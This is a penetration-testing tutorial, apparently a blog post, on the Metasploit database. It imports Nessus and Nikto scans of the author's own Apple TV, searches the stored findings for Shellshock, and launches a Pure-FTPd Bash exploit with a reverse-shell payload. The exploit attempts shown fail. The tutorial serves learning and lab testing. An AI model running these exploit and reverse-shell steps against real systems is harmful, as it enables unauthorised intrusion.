Using the Metasploit database (advanced)

September 1, 2015 | Views: 10677


In my first tutorial I demonstrated the basic usage of the Metasploit database: how to run nmap from within the Metasploit console, how to import nmap scans, and how to display the stored information.

Now we will look a bit deeper into what the Metasploit database can do, and also see what it looks like when importing data from other tools such as Nikto and Nessus. Both tools are very popular. Nikto scans web applications and is free to use. Nessus comes in a free version, which is quite limited, and a professional version, which is quite powerful. In this demo, I will use the free version of Nessus and store the data in the Metasploit database.

Below you see the syntax for importing a previously saved Nessus scan result file into Metasploit. The file must be in the .nessus format for Metasploit to be able to import it. In this example, I have done a credentialed scan of my jailbroken Apple TV to highlight some of the vulnerabilities a Nessus scan can find.

First, we switch to the test workspace from the basic tutorial, where we already have some data stored.

msf > workspace test
[*] Workspace: test
msf >

Then we do the import from Nessus.

msf > db_import /root/Downloads/Apple_TV_scan_g5sugv.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.1.11
[*] Successfully imported /root/Downloads/Apple_TV_scan_g5sugv.nessus
msf >

It is also possible to start a Nessus scan from within Metasploit, but that requires you to know the specific ID of a scan you created in Nessus beforehand. So for this tutorial, I will stick with importing a saved Nessus scan.
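Added example (not from the tutorial, nor Metasploit's own importer): a minimal Python reader for the Nessus XML (v2) format that db_import accepts, producing the host, service and vuln records that the console tables in this tutorial show. The XML sample is constructed here; the plugin ids, CVE and BID are ones visible in the tutorial's vulns output, and the element and attribute names are the standard .nessus v2 ones.

```python
import xml.etree.ElementTree as ET

# Constructed .nessus sample for this example; the plugin ids, CVE and BID are
# the ones that appear in the tutorial's vulns output for 192.168.1.11.
SAMPLE_NESSUS = """<NessusClientData_v2>
 <Report name="Apple_TV_scan">
  <ReportHost name="192.168.1.11">
   <HostProperties>
    <tag name="host-ip">192.168.1.11</tag>
    <tag name="mac-address">b8:17:c2:c9:7e:b5</tag>
    <tag name="operating-system">Mac OS X</tag>
   </HostProperties>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
               pluginID="10881" pluginName="SSH Protocol Versions Supported"/>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="4"
               pluginID="78385"
               pluginName="Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)">
    <cve>CVE-2014-7169</cve>
    <bid>70137</bid>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""

def parse_nessus_v2(xml_text):
    """Return (hosts, services, vulns) in the shape the console tables show.

    Each ReportItem becomes a vuln whose refs carry the CVE and BID children
    plus an NSS-<pluginID> entry, which is the convention behind refs such as
    NSS-78385 in the tutorial. Port 0 marks a host-level finding, so it adds
    no service row.
    """
    root = ET.fromstring(xml_text)
    if root.tag != "NessusClientData_v2":
        raise ValueError("not a Nessus XML (v2) document")
    hosts, services, vulns = [], [], []
    for rh in root.iter("ReportHost"):
        props = {t.get("name"): t.text for t in rh.iter("tag")}
        addr = props.get("host-ip", rh.get("name"))
        hosts.append({"address": addr,
                      "mac": props.get("mac-address", ""),
                      "os_name": props.get("operating-system", "")})
        for item in rh.iter("ReportItem"):
            port = int(item.get("port"))
            proto = item.get("protocol")
            if port > 0:
                svc = {"host": addr, "port": port, "proto": proto,
                       "name": item.get("svc_name")}
                if svc not in services:      # many plugins hit the same port
                    services.append(svc)
            refs = [c.text for c in item.findall("cve")]
            refs += ["BID-" + b.text for b in item.findall("bid")]
            refs.append("NSS-" + item.get("pluginID"))
            vulns.append({"host": addr, "port": port,
                          "name": item.get("pluginName"), "refs": refs})
    return hosts, services, vulns
```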

If we run the hosts command again we now see the following:

msf > hosts

Hosts
=====

address       mac                name            os_name   os_flavor  os_sp  purpose  info  comments
-------       ---                ----            -------   ---------  -----  -------  ----  --------
192.168.1.1   08:63:61:8e:8f:4e  homerouter.cpe  Unknown                     device
192.168.1.3   90:72:40:04:88:4b                  Unknown                     device
192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11    Mac OS X                    device

msf >

We have one more host, 192.168.1.11, which is my Apple TV box.

If we run services we see:

msf > services

Services
========

host          port   proto  name              state     info
----          ----   -----  ----              -----     ----
192.168.1.1   22     tcp    ssh               open
192.168.1.1   8081   tcp    blackice-icecap   filtered
192.168.1.1   23     tcp    telnet            filtered
192.168.1.1   53     tcp    domain            open
192.168.1.1   80     tcp    http              open
192.168.1.1   443    tcp    https             open
192.168.1.1   631    tcp    ipp               filtered
192.168.1.1   3000   tcp    ppp               open
192.168.1.3   445    tcp    microsoft-ds      open
192.168.1.3   548    tcp    afp               open
192.168.1.3   139    tcp    netbios-ssn       open
192.168.1.3   10000  tcp    snet-sensor-mgmt  open
192.168.1.3   5009   tcp    airport-admin     open
192.168.1.11  5353   udp    mdns              open
192.168.1.11  3689   tcp    www               open
192.168.1.11  5000   tcp    rtsp              open
192.168.1.11  7000   tcp    www               open
192.168.1.11  7100   tcp    www               open
192.168.1.11  22     tcp    ssh               open
192.168.1.11  9777   udp                      open
192.168.1.11  123    udp                      open
192.168.1.11  62078  tcp                      open
192.168.1.11  63907  udp                      open

msf >

Now we can use the vulns command to see whether any vulnerabilities found by Nessus are now included in our Metasploit database. As there are quite a few for my Apple TV, I will only list some.

msf > vulns

[*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Backported Security Patch Detection (SSH) refs=NSS-39520
[*] Time: 2015-08-30 07:57:06 UTC Vuln: host=192.168.1.11 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Mac OS X < 10.10 Multiple Vulnerabilities refs=CVE-2011-2391
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Device Type refs=NSS-54615
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=OS Identification refs=NSS-11936
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Time of Last System Startup refs=NSS-56468
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Ethernet Card Manufacturer Detection refs=NSS-35716
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Authenticated Check : OS Name and Installed Package Enumeration refs=NSS-12634
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Apple TV < 7.0.3 Multiple Vulnerabilities refs=CVE-2014-3192
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple TV Detection refs=NSS-42825
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Apple iTunes Music Sharing Enabled refs=NSS-20217
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=HTTP Server Type and Version refs=NSS-10107
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=RTSP Server Type / Version Detection refs=NSS-10762
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Default Password (alpine) for 'root' Account refs=CVE-1999-0502,MSF-SSH User Code Execution,NSS-42367
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Protocol Versions Supported refs=NSS-10881
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SFTP Supported refs=NSS-72663
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Weak MAC Algorithms Enabled refs=NSS-71049
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server CBC Mode Ciphers Enabled refs=CVE-2008-5161,BID-32319,OSVDB-50035,OSVDB-50036,CERT-958563,CWE-200,NSS-70658
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Algorithms and Languages Supported refs=NSS-70657
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Server Type and Version Information refs=NSS-10267
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection (HELP Request) refs=NSS-11153
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Service Detection refs=NSS-22964
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=mDNS Detection (Local Network) refs=NSS-66717
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Traceroute Information refs=NSS-10287
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=TCP/IP Timestamps Supported refs=NSS-25220
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Connection Information refs=NSS-64582
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Netstat Active Connections refs=NSS-58651
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=netstat portscanner (SSH) refs=NSS-14272
msf >

As you can see, there are several, and they all relate to the Apple TV I scanned with Nessus and imported into the Metasploit database. Vulnerabilities are of course very interesting, and some of these might be exploitable, which is what Metasploit is all about. One thing to note here is the advantage of using multiple tools to gather information and then storing that data in Metasploit, which is the premier attack tool for exploiting machines. In a sense, we get the best of both worlds.

As promised, I also import my Nikto scan. Remember, you have to save your Nikto scan in XML format for Metasploit to be able to import it.

msf > db_import /root/nikto.xml
[*] Importing 'Nikto XML' data
[*] Importing host 192.168.1.1
[*] Successfully imported /root/nikto.xml
msf >

Unfortunately, Nikto was unable to detect any vulnerabilities in my web application, so the vulnerabilities listed earlier are the ones we can play with.

I will also mention that both the hosts and services commands have several flags you can play with, for example to add a host (-a) or delete a host (-d). The help command shows all the flags for a particular command, as seen below.

msf > help hosts
Usage: hosts [ options ] [addr1 addr2 ...]

OPTIONS:
  -a,--add          Add the hosts instead of searching
  -d,--delete       Delete the hosts instead of searching
  -c <col1,col2>    Only show the given columns (see list below)
  -h,--help         Show this help information
  -u,--up           Only show hosts which are up
  -o <file>         Send output to a file in csv format
  -R,--rhosts       Set RHOSTS from the results of the search
  -S,--search       Search string to filter by
  -i,--info         Change the info of a host
  -n,--name         Change the name of a host
  -m,--comment      Change the comment of a host
  -t,--tag          Add or specify a tag to a range of hosts

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags

msf >

Going back to our vulnerabilities, we can also use the vulns command to search for specific ones, such as the infamous Shellshock vulnerability that was listed. We use the -S parameter with the vulns command, as seen below. This lists only the vulnerabilities where "Shellshock" appears.

msf > vulns -S shellshock
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (CVE-2014-6277 / CVE-2014-6278) (Shellshock) refs=CVE-2014-6277,CVE-2014-6278,BID-70165,BID-70166,OSVDB-112158,OSVDB-112169,CERT-252743,IAVA-2014-A-0142,EDB-ID-34860,MSF-CUPS Filter Bash Environment Variable Code Injection,NSS-78067
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock) refs=CVE-2014-7169,BID-70137,OSVDB-112004,CERT-252743,IAVA-2014-A-0142,EDB-ID-34765,EDB-ID-34766,EDB-ID-34777,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-78385
msf >

In our next step, let's search the Metasploit exploit library to find a match. We use the built-in search command for this. As you can see, we get three matches.

msf > search shellshock

Matching Modules
================

Name                                      Disclosure Date  Rank       Description
----                                      ---------------  ----       -----------
auxiliary/server/dhclient_bash_env        2014-09-24       normal     DHCP Client Bash Environment Variable Code Injection
exploit/multi/ftp/pureftpd_bash_env_exec  2014-09-24       excellent  Pure-FTPd External Authentication Bash Environment Variable Code Injection
exploit/multi/http/cups_bash_env_exec     2014-09-24       good       CUPS Filter Bash Environment Variable Code Injection

msf >

If you look closely, you see that there is a Pure-FTPd bash exploit rated excellent, and that the same module name appears as an MSF- reference in the vulnerabilities from our previous search. This looks like a splendid candidate to try and exploit.
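Added example, not code from the tutorial or from Metasploit: a Python parser for the vulns output lines shown above that applies a case-insensitive filter over names and references (an approximation of vulns -S), cross-references the MSF- references against the search output to find findings that already have a module (the Pure-FTPd match made by eye above), and writes CSV in the spirit of the -o flag. The sample lines are copied from the tutorial's output; the function names are my own.

```python
import re
import csv
import io

# Three lines copied from the tutorial's "vulns" output (sample input).
VULNS_OUTPUT = """\
[*] Time: 2015-08-30 07:57:07 UTC Vuln: host=192.168.1.11 name=Bash Remote Code Execution (Shellshock) refs=CVE-2014-6271,BID-70103,OSVDB-112004,EDB-ID-34765,IAVA-2014-A-0142,EDB-ID-34766,MSF-Pure-FTPd External Authentication Bash Environment Variable Code Injection,NSS-77823
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=Default Password (alpine) for 'root' Account refs=CVE-1999-0502,MSF-SSH User Code Execution,NSS-42367
[*] Time: 2015-08-30 07:57:08 UTC Vuln: host=192.168.1.11 name=SSH Weak MAC Algorithms Enabled refs=NSS-71049
"""

# The rows of the tutorial's "search shellshock" output as (module, description).
SEARCH_OUTPUT = [
    ("auxiliary/server/dhclient_bash_env", "DHCP Client Bash Environment Variable Code Injection"),
    ("exploit/multi/ftp/pureftpd_bash_env_exec", "Pure-FTPd External Authentication Bash Environment Variable Code Injection"),
    ("exploit/multi/http/cups_bash_env_exec", "CUPS Filter Bash Environment Variable Code Injection"),
]

VULN_LINE = re.compile(
    r"^\[\*\] Time: (?P<time>\S+ \S+ UTC) Vuln: host=(?P<host>\S+) "
    r"name=(?P<name>.*?) refs=(?P<refs>.*)$")

def parse_vulns(text):
    """Turn each "[*] Time: ... Vuln: ..." line into a dict.
    The name is matched lazily so the first ' refs=' ends it; refs are
    comma separated and the MSF- entries contain spaces."""
    records = []
    for line in text.splitlines():
        m = VULN_LINE.match(line)
        if m:
            rec = m.groupdict()
            rec["refs"] = rec["refs"].split(",")
            records.append(rec)
    return records

def search_vulns(records, needle):
    """Case-insensitive substring filter over name and refs, like 'vulns -S'."""
    needle = needle.lower()
    return [r for r in records
            if needle in r["name"].lower()
            or any(needle in ref.lower() for ref in r["refs"])]

def modules_for(records, search_rows):
    """Map each finding to the modules whose description equals one of its
    MSF- references: the match the tutorial makes by eye for Pure-FTPd."""
    by_desc = {desc: name for name, desc in search_rows}
    hits = {}
    for r in records:
        for ref in r["refs"]:
            if ref.startswith("MSF-") and ref[4:] in by_desc:
                hits.setdefault(r["name"], []).append(by_desc[ref[4:]])
    return hits

def to_csv(records):
    """CSV export of the parsed findings, like the -o flag of hosts/services."""
    buf = io.StringIO()
    w = csv.writer(buf)
    w.writerow(["host", "name", "refs"])
    for r in records:
        w.writerow([r["host"], r["name"], ";".join(r["refs"])])
    return buf.getvalue()
```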

That brings us to the last step of this tutorial: loading data into the exploit settings directly from the information in the Metasploit database.

First, we select the Pure-FTPd exploit.

msf > use exploit/multi/ftp/pureftpd_bash_env_exec
msf exploit(pureftpd_bash_env_exec) >

We look at the options for this exploit and notice that we need to set RHOST. Let's see whether this can be done by querying the Metasploit database.

msf exploit(pureftpd_bash_env_exec) > show options

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT  21               yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(pureftpd_bash_env_exec) >

Let's see if we can find the Apple TV machine in our database. With this exploit, you can see that there is no RHOSTS variable, only an RHOST variable. So, in this case it will not be possible to use the -R flag of the hosts command to populate RHOST with the search result. Many auxiliary modules do support the RHOSTS variable, and there this would work.

Below is an example of setting the RHOSTS variable from a hosts search.

msf exploit(pureftpd_bash_env_exec) > hosts -S Mac -R

Hosts
=====

address       mac                name          os_name   os_flavor  os_sp  purpose  info  comments
-------       ---                ----          -------   ---------  -----  -------  ----  --------
192.168.1.11  b8:17:c2:c9:7e:b5  192.168.1.11  Mac OS X                    device

RHOSTS => 192.168.1.11
msf exploit(pureftpd_bash_env_exec) >

However, running show options below verifies that the RHOST variable is still not set, because the command above only works when the module has an RHOSTS variable. Unfortunately, Metasploit does not print an error but simply reports RHOSTS as being set. So, always use show options to check that all your variables have actually been set.

msf exploit(pureftpd_bash_env_exec) > show options

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT  21               yes       The target port

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.6      yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(pureftpd_bash_env_exec) >

So, we set the RHOST variable manually and run show options again.

msf exploit(pureftpd_bash_env_exec) > set RHOST 192.168.1.11
RHOST => 192.168.1.11
msf exploit(pureftpd_bash_env_exec) > show options

Module options (exploit/multi/ftp/pureftpd_bash_env_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.11     yes       The target address
   RPATH  /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT  21               yes       The target port

Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.6      yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf exploit(pureftpd_bash_env_exec) >

OK, all set. If we are happy with the default payload, we can launch the exploit attempt by entering either exploit or run.

msf exploit(pureftpd_bash_env_exec) > run

[*] Started reverse handler on 192.168.1.6:4444
[-] Exploit aborted due to failure: bad-config: 192.168.1.11:21 - Failed to store payload inside executable, please select a native payload

That did not work, and a little research tells us that there is a problem with the default payload option. So we select another payload and try to run the exploit again.

msf exploit(pureftpd_bash_env_exec) > set PAYLOAD linux/x86/shell_reverse_tcp
PAYLOAD => linux/x86/shell_reverse_tcp
msf exploit(pureftpd_bash_env_exec) > run

[*] Started reverse handler on 192.168.1.6:4444
[-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.11:21).
msf exploit(pureftpd_bash_env_exec) >

Unfortunately, it fails: the connection to port 21 is refused, which matches the services table, where no FTP service was recorded on 192.168.1.11. Sometimes it is not as easy to exploit a machine as it might appear. Vulnerability scanners such as Nessus can be wrong, and exploits can fail.

Nevertheless, there is a great advantage in using the Metasploit database as a store for information you collect with other tools. Hopefully I have demonstrated some of the benefits of using it. There are things I have not demonstrated yet, so feel free to really explore the different options of the Metasploit database.

I will leave you with two things. The first is the -o flag, which you can use with several of the database commands in Metasploit; try services -o and hosts -o. It exports data in CSV format, which can be valuable. The last thing is the help command. Simply type help and you will get a list of all available commands; here is the section for the Metasploit database.

Database Backend Commands
=========================

    Command           Description
    -------           -----------
    creds             List all credentials in the database
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

The only thing that remains is to say Good Luck in using the Metasploit database.

5 Comments
  1. It does work; it seems that your interpreter doesn't work.

  2. Thanks man <3

  3. [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.11:21).

    Same Problem anyone have solution

  4. Much appreciated
